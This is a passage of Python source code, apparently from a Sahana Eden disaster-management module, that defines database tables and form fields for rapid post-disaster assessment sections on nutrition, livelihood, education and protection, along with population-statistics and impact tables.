"Were there reports or evidence of outbreaks of any micronutrient malnutrition disorders before the emergency?")),
Field("breast_milk_substitutes_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Breast milk substitutes used prior to disaster",
"Were breast milk substitutes used prior to the disaster?")),
Field("breast_milk_substitutes_post_disaster", "boolean",
**rat_label_and_tooltip(
"Breast milk substitutes in use since disaster",
"Are breast milk substitutes being used here since the disaster?")),
Field("infant_nutrition_alternative", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_infant_nutrition_alternative_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_infant_nutrition_alternative_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Alternative infant nutrition in use",
"Babies who are not being breastfed, what are they being fed on?",
multiple=True)),
Field("infant_nutrition_alternative_other",
label = T("Other alternative infant nutrition in use")),
Field("u5_diarrhea", "boolean",
**rat_label_and_tooltip(
"Diarrhea among children under 5",
"Are there cases of diarrhea among children under the age of 5?")),
Field("u5_diarrhea_rate_48h", "integer",
**rat_label_and_tooltip(
"Approx. number of cases/48h",
"Approximately how many children under 5 with diarrhea in the past 48 hours?")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 6 - Nutrition/Food Security -------------------------------------
rat_main_dish_types = {
1: T("Rice"),
2: T("Noodles"),
3: T("Biscuits"),
4: T("Corn"),
5: T("Wheat"),
6: T("Cassava"),
7: T("Cooking Oil")
}
rat_side_dish_types = {
1: T("Salted Fish"),
2: T("Canned Fish"),
3: T("Chicken"),
4: T("Eggs"),
99: T("Other (specify)")
}
rat_food_stock_reserve_opts = {
1: T("1-3 days"),
2: T("4-7 days"),
3: T("8-14 days")
}
rat_food_source_types = {
1: T("Local market"),
2: T("Field cultivation"),
3: T("Food stall"),
4: T("Animal husbandry"),
5: T("Raising poultry"),
99: T("Other (specify)")
}
tablename = "assess_section6"
define_table(tablename,
assessment_id(),
Field("food_stocks_main_dishes", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_main_dish_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_main_dish_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Existing food stocks, main dishes",
"What food stocks exist? (main dishes)",
multiple=True)),
# @ToDo: Should there be a field "food_stocks_other_main_dishes"?
Field("food_stocks_side_dishes", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_side_dish_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_side_dish_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Existing food stocks, side dishes",
"What food stocks exist? (side dishes)",
multiple=True)),
Field("food_stocks_other_side_dishes",
label = T("Other side dishes in stock")),
Field("food_stocks_reserve", "integer",
label = T("How long will the food last?"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_food_stock_reserve_opts,
zero=None)),
represent = lambda opt: rat_food_stock_reserve_opts.get(opt,
UNKNOWN_OPT)),
Field("food_sources", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_food_source_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_food_source_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Usual food sources in the area",
"What are the people's normal ways to obtain food in this area?",
multiple=True)),
Field("food_sources_other",
label = T("Other ways to obtain food")),
Field("food_sources_disruption", "boolean",
**rat_label_and_tooltip(
"Normal food sources disrupted",
"Have normal food sources been disrupted?")),
Field("food_sources_disruption_details",
label = T("If yes, which and how")),
Field("food_assistance_available", "boolean",
**rat_label_and_tooltip(
"Food assistance available/expected",
"Have the people received or are you expecting any medical or food assistance in the coming days?")),
Field("food_assistance_details", "text",
label = T("If yes, specify what and by whom")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 7 - Livelihood --------------------------------------------------
rat_income_source_opts = {
1: T("Agriculture"),
2: T("Fishing"),
3: T("Poultry"),
4: T("Casual Labor"),
5: T("Small Trade"),
6: T("Other")
}
rat_expense_types = {
1: T("Education"),
2: T("Health"),
3: T("Food"),
4: T("Hygiene"),
5: T("Shelter"),
6: T("Clothing"),
7: T("Funeral"),
8: T("Alcohol"),
99: T("Other (specify)")
}
rat_cash_source_opts = {
1: T("Family/friends"),
2: T("Government"),
3: T("Bank/micro finance"),
4: T("Humanitarian NGO"),
99: T("Other (specify)")
}
rat_ranking_opts = xrange(1, 7)
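# xrange(1, 7) yields the ranks 1-6 (Python 2 idiom); this iterable is used as
# the set of valid values for the ranking fields below.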
tablename = "assess_section7"
define_table(tablename,
assessment_id(),
Field("income_sources_pre_disaster", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_income_source_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_income_source_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Main income sources before disaster",
"What were your main sources of income before the disaster?",
multiple=True)),
Field("income_sources_post_disaster", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_income_source_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_income_source_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Current main income sources",
"What are your main sources of income now?",
multiple=True)),
Field("main_expenses", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_expense_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_expense_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Current major expenses",
"What do you spend most of your income on now?",
multiple=True)),
Field("main_expenses_other",
label = T("Other major expenses")),
Field("business_damaged", "boolean",
**rat_label_and_tooltip(
"Business damaged",
"Has your business been damaged in the course of the disaster?")),
Field("business_cash_available", "boolean",
**rat_label_and_tooltip(
"Cash available to restart business",
"Do you have access to cash to restart your business?")),
Field("business_cash_source", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_cash_source_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_cash_source_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Main cash source",
"What are your main sources of cash to restart your business?")),
Field("rank_reconstruction_assistance", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None)),
**rat_label_and_tooltip(
"Immediate reconstruction assistance, Rank",
"Assistance for immediate repair/reconstruction of houses")),
Field("rank_farmland_fishing_assistance", "integer",
label = T("Farmland/fishing material assistance, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
Field("rank_poultry_restocking", "integer",
label = T("Poultry restocking, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
Field("rank_health_care_assistance", "integer",
label = T("Health care assistance, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
Field("rank_transportation_assistance", "integer",
label = T("Transportation assistance, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
Field("other_assistance_needed",
label = T("Other assistance needed")),
Field("rank_other_assistance", "integer",
label = T("Other assistance, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 8 - Education ---------------------------------------------------
rat_schools_salvmat_types = {
1: T("Wooden plank"),
2: T("Zinc roof"),
3: T("Bricks"),
4: T("Wooden poles"),
5: T("Door frame"),
6: T("Window frame"),
7: T("Roof tile"),
999: NOT_APPLICABLE
}
rat_alternative_study_places = {
1: T("Community Centre"),
2: T("Church"),
3: T("Mosque"),
4: T("Open area"),
5: T("Government building"),
6: T("Other (specify)"),
999: NOT_APPLICABLE
}
rat_school_attendance_barriers_opts = {
1: T("School used for other purpose"),
2: T("School destroyed"),
3: T("Lack of school uniform"),
4: T("Lack of transport to school"),
5: T("Children not enrolled in new school"),
6: T("School heavily damaged"),
7: T("Desire to remain with family"),
8: T("Lack of supplies at school"),
9: T("Displaced"),
10: T("Other (specify)"),
999: NOT_APPLICABLE
}
tablename = "assess_section8"
define_table(tablename,
assessment_id(),
Field("schools_total", "integer",
label = T("Total number of schools in affected area"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("schools_public", "integer",
label = T("Number of public schools"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("schools_private", "integer",
label = T("Number of private schools"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("schools_religious", "integer",
label = T("Number of religious schools"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("schools_destroyed", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of schools destroyed/uninhabitable",
"uninhabitable = foundation and structure destroyed")),
Field("schools_damaged", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of schools damaged but usable",
"windows broken, cracks in walls, roof slightly damaged")),
Field("schools_salvmat", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_schools_salvmat_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_schools_salvmat_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Salvage material usable from destroyed schools",
"What type of salvage material can be used from destroyed schools?",
multiple=True)),
Field("alternative_study_places_available", "boolean",
**rat_label_and_tooltip(
"Alternative places for studying available",
"Are there alternative places for studying?")),
Field("alternative_study_places_number", "integer",
label = T("Number of alternative places for studying"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("alternative_study_places", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_alternative_study_places,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_alternative_study_places: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Alternative places for studying",
"Where are the alternative places for studying?",
multiple=True)),
Field("alternative_study_places_other",
label = T("Other alternative places for study")),
Field("schools_open_pre_disaster", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of schools open before disaster",
"How many primary/secondary schools were opening prior to the disaster?")),
Field("schools_open_post_disaster", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of schools open now",
"How many of the primary/secondary schools are now open and running a regular schedule of class?")),
Field("teachers_active_pre_disaster", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of teachers before disaster",
"How many teachers worked in the schools prior to the disaster?")),
Field("teachers_affected_by_disaster", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of teachers affected by disaster",
"How many teachers have been affected by the disaster (affected = unable to work)?")),
Field("children_0612_female", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Girls 6-12 yrs in affected area",
"How many primary school age girls (6-12) are in the affected area?")),
Field("children_0612_male", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Boys 6-12 yrs in affected area",
"How many primary school age boys (6-12) are in the affected area?")),
Field("children_0612_not_in_school_female", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Girls 6-12 yrs not attending school",
"How many of the primary school age girls (6-12) in the area are not attending school?")),
Field("children_0612_not_in_school_male", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Boys 6-12 yrs not attending school",
"How many of the primary school age boys (6-12) in the area are not attending school?")),
Field("children_1318_female", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Girls 13-18 yrs in affected area",
"How many secondary school age girls (13-18) are in the affected area?")),
Field("children_1318_male", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Boys 13-18 yrs in affected area",
"How many secondary school age boys (13-18) are in the affected area?")),
Field("children_1318_not_in_school_female", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Girls 13-18 yrs not attending school",
"How many of the secondary school age girls (13-18) in the area are not attending school?")),
Field("children_1318_not_in_school_male", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Boys 13-18 yrs not attending school",
"How many of the secondary school age boys (13-18) in the area are not attending school?")),
Field("school_attendance_barriers", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_school_attendance_barriers_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_school_attendance_barriers_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Factors affecting school attendance",
"What are the factors affecting school attendance?",
multiple=True)),
Field("school_attendance_barriers_other",
label = T("Other factors affecting school attendance")),
Field("school_assistance_available", "boolean",
**rat_label_and_tooltip(
"School assistance received/expected",
"Have schools received or are expecting to receive any assistance?")),
Field("school_assistance_tents_available", "boolean",
label = T("School tents received")),
Field("school_assistence_tents_source",
label = T("School tents, source")),
Field("school_assistance_materials_available", "boolean",
label = T("Education materials received")),
Field("school_assistance_materials_source",
label = T("Education materials, source")),
Field("school_assistance_other_available", "boolean",
label = T("Other school assistance received")),
Field("school_assistance_other",
label = T("Other school assistance, details")),
Field("school_assistance_other_source",
label = T("Other school assistance, source")),
s3_comments(),
*s3_meta_fields())
# @ToDo: onvalidation!
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 9 - Protection --------------------------------------------------
rat_fuzzy_quantity_opts = {
1: T("None"),
2: T("Few"),
3: T("Some"),
4: T("Many")
}
rat_quantity_opts = {
1: "1-10",
2: "11-50",
3: "51-100",
4: "100+"
}
rat_child_activity_opts = {
1: T("Playing"),
2: T("Domestic chores"),
3: T("School/studying"),
4: T("Doing nothing (no structured activity)"),
5: T("Working or other to provide money/food"),
99: T("Other (specify)")
}
rat_child_activity_post_disaster_opts = rat_child_activity_opts.copy()
rat_child_activity_post_disaster_opts.update({
6: T("Disaster clean-up/repairs")
})
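# The post-disaster activity options reuse the pre-disaster set and add option 6
# ("Disaster clean-up/repairs"); the *_post_disaster fields below validate
# against this extended set.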
tablename = "assess_section9"
define_table(tablename,
assessment_id(),
Field("vulnerable_groups_safe_env", "boolean",
label = T("Safe environment for vulnerable groups"),
comment = rat_tooltip("Are the areas that children, older people, and people with disabilities live in, play in and walk through on a daily basis physically safe?")),
Field("safety_children_women_affected", "boolean",
label = T("Safety of children and women affected by disaster?"),
comment = rat_tooltip("Has the safety and security of women and children in your community changed since the emergency?")),
Field("sec_incidents", "boolean",
label = T("Known incidents of violence since disaster"),
comment = rat_tooltip("Do you know of any incidents of violence?")),
Field("sec_incidents_gbv", "boolean",
label = T("Known incidents of violence against women/girls"),
comment = rat_tooltip("Without mentioning any names or indicating anyone, do you know of any incidents of violence against women or girls occuring since the disaster?")),
Field("sec_current_needs",
label = T("Needs to reduce vulnerability to violence"),
comment = rat_tooltip("What should be done to reduce women and children's vulnerability to violence?")),
Field("children_separated", "integer",
label = T("Children separated from their parents/caregivers"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children separated from their parents or caregivers?")),
Field("children_separated_origin",
label = T("Origin of the separated children"),
comment = rat_tooltip("Where are the separated children originally from?")),
Field("children_missing", "integer",
label = T("Parents/Caregivers missing children"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of parents/caregivers missing children?")),
Field("children_orphaned", "integer",
label = T("Children orphaned by the disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children that have been orphaned by the disaster?")),
Field("children_unattended", "integer",
label = T("Children living on their own (without adults)"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children living on their own (without adults)?")),
Field("children_disappeared", "integer",
label = T("Children who have disappeared since the disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children that have disappeared without explanation in the period since the disaster?")),
Field("children_evacuated", "integer",
label = T("Children that have been sent to safe places"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children that have been sent to safe places?")),
Field("children_evacuated_to",
label = T("Places the children have been sent to"),
comment = rat_tooltip("Where have the children been sent?")),
Field("children_with_older_caregivers", "integer",
label = T("Older people as primary caregivers of children"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of older people who are primary caregivers of children?")),
Field("children_in_disabled_homes", "boolean",
label = T("Children in homes for disabled children"),
comment = rat_tooltip("Are there children living in homes for disabled children in this area?")),
Field("children_in_orphanages", "boolean",
label = T("Children in orphanages"),
comment = rat_tooltip("Are there children living in orphanages in this area?")),
Field("children_in_boarding_schools", "boolean",
label = T("Children in boarding schools"),
comment = rat_tooltip("Are there children living in boarding schools in this area?")),
Field("children_in_juvenile_detention", "boolean",
label = T("Children in juvenile detention"),
comment = rat_tooltip("Are there children living in juvenile detention in this area?")),
Field("children_in_adult_prisons", "boolean",
label = T("Children in adult prisons"),
comment = rat_tooltip("Are there children living in adult prisons in this area?")),
Field("people_in_adult_prisons", "boolean",
label = T("Adults in prisons"),
comment = rat_tooltip("Are there adults living in prisons in this area?")),
Field("people_in_care_homes", "boolean",
label = T("Older people in care homes"),
comment = rat_tooltip("Are there older people living in care homes in this area?")),
Field("people_in_institutions_est_total", "integer",
label = T("Estimated total number of people in institutions"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_quantity_opts,
zero=None)),
represent = lambda opt: rat_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("What is the estimated total number of people in all of these institutions?")),
Field("staff_in_institutions_present", "boolean",
label = T("Staff present and caring for residents"),
comment = rat_tooltip("Are there staff present and caring for the residents in these institutions?")),
Field("adequate_food_water_in_institutions", "boolean",
label = T("Adequate food and water available"),
comment = rat_tooltip("Is adequate food and water available for these institutions?")),
Field("child_activities_u12f_pre_disaster", "list:integer",
label = T("Activities of girls <12yrs before disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How did girls <12yrs spend most of their time prior to the disaster?",
multiple=True)),
Field("child_activities_u12f_pre_disaster_other",
label = T("Other activities of girls<12yrs before disaster")),
Field("child_activities_u12m_pre_disaster", "list:integer",
label = T("Activities of boys <12yrs before disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How did boys <12yrs spend most of their time prior to the disaster?",
multiple=True)),
Field("child_activities_u12m_pre_disaster_other",
label = T("Other activities of boys <12yrs before disaster")),
Field("child_activities_o12f_pre_disaster", "list:integer",
label = T("Activities of girls 13-17yrs before disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How did boys girls 13-17yrs spend most of their time prior to the disaster?",
multiple=True)),
Field("child_activities_o12f_pre_disaster_other",
label = T("Other activities of girls 13-17yrs before disaster")),
Field("child_activities_o12m_pre_disaster", "list:integer",
label = T("Activities of boys 13-17yrs before disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How did boys 13-17yrs spend most of their time prior to the disaster?",
multiple=True)),
Field("child_activities_o12m_pre_disaster_other",
label = T("Other activities of boys 13-17yrs before disaster")),
Field("child_activities_u12f_post_disaster", "list:integer",
label = T("Activities of girls <12yrs now"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_post_disaster_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_post_disaster_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How do girls <12yrs spend most of their time now?",
multiple=True)),
Field("child_activities_u12f_post_disaster_other",
label = T("Other activities of girls<12yrs")),
Field("child_activities_u12m_post_disaster", "list:integer",
label = T("Activities of boys <12yrs now"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_post_disaster_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_post_disaster_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How do boys <12yrs spend most of their time now?",
multiple=True)),
Field("child_activities_u12m_post_disaster_other",
label = T("Other activities of boys <12yrs")),
Field("child_activities_o12f_post_disaster", "list:integer",
label = T("Activities of girls 13-17yrs now"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_post_disaster_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_post_disaster_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How do girls 13-17yrs spend most of their time now?",
multiple=True)),
Field("child_activities_o12f_post_disaster_other",
label = T("Other activities of girls 13-17yrs")),
Field("child_activities_o12m_post_disaster", "list:integer",
label = T("Activities of boys 13-17yrs now"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_post_disaster_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_post_disaster_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How do boys 13-17yrs spend most of their time now?",
multiple=True)),
Field("child_activities_o12m_post_disaster_other",
label = T("Other activities of boys 13-17yrs")),
Field("coping_activities_elderly", "boolean",
label = T("Older people participating in coping activities"),
comment = rat_tooltip("Do older people in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("coping_activities_women", "boolean",
label = T("Women participating in coping activities"),
comment = rat_tooltip("Do women in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("coping_activities_disabled", "boolean",
label = T("Disabled participating in coping activities"),
comment = rat_tooltip("Do people with disabilities in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("coping_activities_minorities", "boolean",
label = T("Minorities participating in coping activities"),
comment = rat_tooltip("Do minority members in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("coping_activities_adolescent", "boolean",
label = T("Adolescent participating in coping activities"),
comment = rat_tooltip("Do adolescent and youth in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("current_general_needs", "text",
label = T("Current greatest needs of vulnerable groups"),
comment = rat_tooltip("In general, what are the greatest needs of older people, people with disabilities, children, youth and women in your community?")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Sections as components of RAT
add_components("assess_rat",
assess_section2={"joinby": "assessment_id",
"multiple": False,
},
assess_section3={"joinby": "assessment_id",
"multiple": False,
},
assess_section4={"joinby": "assessment_id",
"multiple": False,
},
assess_section5={"joinby": "assessment_id",
"multiple": False,
},
assess_section6={"joinby": "assessment_id",
"multiple": False,
},
assess_section7={"joinby": "assessment_id",
"multiple": False,
},
assess_section8={"joinby": "assessment_id",
"multiple": False,
},
assess_section9={"joinby": "assessment_id",
"multiple": False,
},
)
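# (Each section is registered as a single-record component ("multiple": False)
# of assess_rat, which is what makes it appear as exactly one tab per section
# in the RAT CRUD interface configured further below.)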
# -----------------------------------------------------------------------------
def assess_rat_summary(r, **attr):
""" Aggregate reports """
if r.name == "rat":
if r.representation == "html":
return dict()
elif r.representation == "xls":
return None
else:
# Other formats?
raise HTTP(501, body=ERROR.BAD_FORMAT)
else:
raise HTTP(501, body=ERROR.BAD_METHOD)
s3db.set_method("assess", "rat",
method="summary",
action=assess_rat_summary)
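# Illustrative usage note (assumption about the resulting URLs): with the
# custom method registered above, an aggregate report would typically be
# requested as e.g.
#   /assess/rat/summary        -> HTML (empty dict, rendered by the view)
#   /assess/rat/summary.xls    -> XLS export (returns None here; built elsewhere)
# Any other representation or resource raises HTTP 501 (BAD_FORMAT/BAD_METHOD).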
# Pass variables back to global scope (response.s3.*)
# =========================================================================
# UN Common Operational Datasets
# =========================================================================
# Population Statistics
tablename = "assess_population"
define_table(tablename,
location_id(widget = S3LocationAutocompleteWidget(),
requires = IS_LOCATION()),
Field("population", "integer"),
Field("households", "integer"),
Field("median_age", "double"),
Field("average_family_size", "double"),
Field("effective_date", "datetime"),
s3_comments(),
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
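# (Note: unlike the RAT section tables, this table does not use s3_meta_fields();
# it attaches only the timestamp, UID and deletion-status meta fields.)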
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Add Population Statistic"),
title_display = T("Population Statistic Details"),
title_list = T("Population Statistics"),
title_update = T("Edit Population Statistic"),
label_list_button = T("List Population Statistics"),
label_delete_button = T("Delete Population Statistic"),
msg_record_created = T("Population Statistic added"),
msg_record_modified = T("Population Statistic updated"),
msg_record_deleted = T("Population Statistic deleted"),
msg_list_empty = T("No Population Statistics currently registered"),
name_nice = T("Population Statistic"),
name_nice_plural = T("Population Statistics"))
# Impact as component of incident reports
#add_components("irs_ireport", impact_impact="ireport_id")
# =========================================================================
def impact_tables():
""" Load the Impact tables as-needed """
sector_id = s3db.org_sector_id
ireport_id = s3db.irs_ireport_id
# Load the models we depend on
if settings.has_module("assess"):
assess_tables()
assess_id = s3.assess_id
module = "impact"
# -------------------------------------------------------------------------
# Impact Type
resourcename = "type"
tablename = "%s_%s" % (module, resourcename)
db.define_table(tablename,
Field("name", length=128, notnull=True, unique=True),
sector_id(),
*s3_meta_fields())
# CRUD strings
ADD_IMPACT_TYPE = T("Add Impact Type")
s3.crud_strings[tablename] = Storage(
label_create = ADD_IMPACT_TYPE,
title_display = T("Impact Type Details"),
title_list = T("Impact Types"),
title_update = T("Edit Impact Type"),
label_list_button = T("List Impact Types"),
label_delete_button = T("Delete Impact Type"),
msg_record_created = T("Impact Type added"),
msg_record_modified = T("Impact Type updated"),
msg_record_deleted = T("Impact Type deleted"),
msg_list_empty = T("No Impact Types currently registered"),
name_nice = T("Impact"),
name_nice_plural = T("Impacts"))
def impact_type_comment():
if auth.has_membership(auth.id_group("Administrator")):
return S3AddResourceLink(c="assess",
f="type",
vars=dict(child="impact_type_id"))
else:
return None
represent = S3Represent(tablename)
impact_type_id = S3ReusableField("impact_type_id", "reference %s" % tablename,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db,
"impact_type.id",
represent,
sort=True)),
represent = represent,
label = T("Impact Type"),
comment = impact_type_comment(),
ondelete = "RESTRICT")
# =====================================================================
# Impact
# Load model
ireport_id = s3db.irs_ireport_id
tablename = "assess_impact"
define_table(tablename,
ireport_id(readable=False, writable=False),
assess_id(readable=False, writable=False),
impact_type_id(),
Field("value", "double"),
Field("severity", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(assess_severity_opts)),
widget=SQLFORM.widgets.radio.widget,
represent = s3_assess_severity_represent,
default = 0),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_IMPACT = T("Add Impact")
crud_strings[tablename] = Storage(
label_create = ADD_IMPACT,
title_display = T("Impact Details"),
title_list = T("Impacts"),
title_update = T("Edit Impact"),
label_list_button = T("List Impacts"),
label_delete_button = T("Delete Impact"),
msg_record_created = T("Impact added"),
msg_record_modified = T("Impact updated"),
msg_record_deleted = T("Impact deleted"),
msg_list_empty = T("No Impacts currently registered"))
# =============================================================================
def index():
""" Module's Home Page """
module_name = settings.modules[module].name_nice
response.title = module_name
return dict(module_name=module_name)
# -----------------------------------------------------------------------------
def create():
""" Redirect to assess/create """
redirect(URL(f="assess", args="create"))
# =============================================================================
# UN Common Operational Datasets
# =============================================================================
def population():
""" RESTful controller """
output = s3_rest_controller()
return output
# =============================================================================
# Rapid Assessments
# =============================================================================
def rat():
""" Rapid Assessments, RESTful controller """
# Load Models
assess_tables()
tablename = "%s_%s" % (module, resourcename)
table = db[tablename]
# Villages only
#table.location_id.requires = IS_NULL_OR(IS_ONE_OF(db(db.gis_location.level == "L5"),
# "gis_location.id",
# repr_select, sort=True))
# Subheadings in forms:
configure("assess_section2",
subheadings = {
T("Population and number of households"): "population_total",
T("Fatalities"): "dead_women",
T("Casualties"): "injured_women",
